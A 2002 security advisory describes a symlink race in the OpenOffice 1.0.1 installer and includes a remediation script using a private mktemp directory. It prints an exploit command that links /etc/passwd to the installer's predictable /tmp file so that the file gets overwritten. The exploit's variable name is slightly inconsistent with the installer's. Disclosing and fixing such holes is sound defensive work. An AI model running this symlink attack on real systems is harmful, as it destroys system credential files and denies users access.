====== OpenOffice 1.0.1 Race Condition During Installation ======

//9/9/02//

**Summary:** OpenOffice 1.0.1: a race condition during installation can overwrite system files.

**Severity:** Low

**Description:** A very simple and easy-to-exploit race condition exists during the installation of OpenOffice. The installer writes its autoresponse file to a predictable, world-writable location (/tmp/${USER}_autoresponse.conf) without checking whether that path already exists. During this window a malicious user could create a symlink in /tmp and overwrite arbitrary files.

**Exploit:** As a normal user:

<code>
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
</code>

will result in the password file being overwritten with:

<code bash>
# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=
[JAVA]
JavaSupport=preinstalled_or_none
EOF
</code>

**Fix:** Create a directory under /tmp to work from, with restrictive permissions.

**References:** http://www.openoffice.org/dev_docs/source/1.0.1/index.html

I happened to find this bug with my crude kernel patch at http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
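The fix described above, as an added example that is not OpenOffice's installer code: the autoresponse file is written inside a fresh, randomly named directory created by mktemp -d with mode 0700, so there is no predictable /tmp path at which a symlink could be planted. The variables installtype, prefix and oo_home mirror the advisory's heredoc; the function name, argument defaults and directory template are assumptions.

```shell
#!/bin/sh
# Added example (not OpenOffice's installer): write the autoresponse file in a
# private per-run work directory instead of at a fixed, guessable /tmp path.
# Body runs in a subshell so the umask change does not leak to the caller.
write_autoresponse() (
    installtype=${1:-STANDALONE}                # assumed defaults for the demo
    prefix=${2:-/opt}
    oo_home=${3:-OpenOffice.org1.0.1}

    # Files created below must not be readable by other users.
    umask 077

    # mktemp -d atomically creates a new directory (mode 0700, random name).
    # It fails rather than reuse an existing path, so another user cannot
    # pre-create the directory or place a symlink where our file will go.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/ooinst.XXXXXX") || exit 1
    conf="$workdir/autoresponse.conf"

    # Belt-and-braces check that we really own a plain directory.
    if [ -L "$workdir" ] || [ ! -d "$workdir" ]; then
        echo "unsafe work directory: $workdir" >&2
        exit 1
    fi

    # The advisory's heredoc, unchanged, but aimed at the private path.
    cat << EOF > "$conf"
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=
[JAVA]
JavaSupport=preinstalled_or_none
EOF

    # Hand the caller the path it must use (and later remove with rm -rf).
    printf '%s\n' "$conf"
)
```

The caller is responsible for removing the work directory when the install finishes; until then it is only accessible to the installing user.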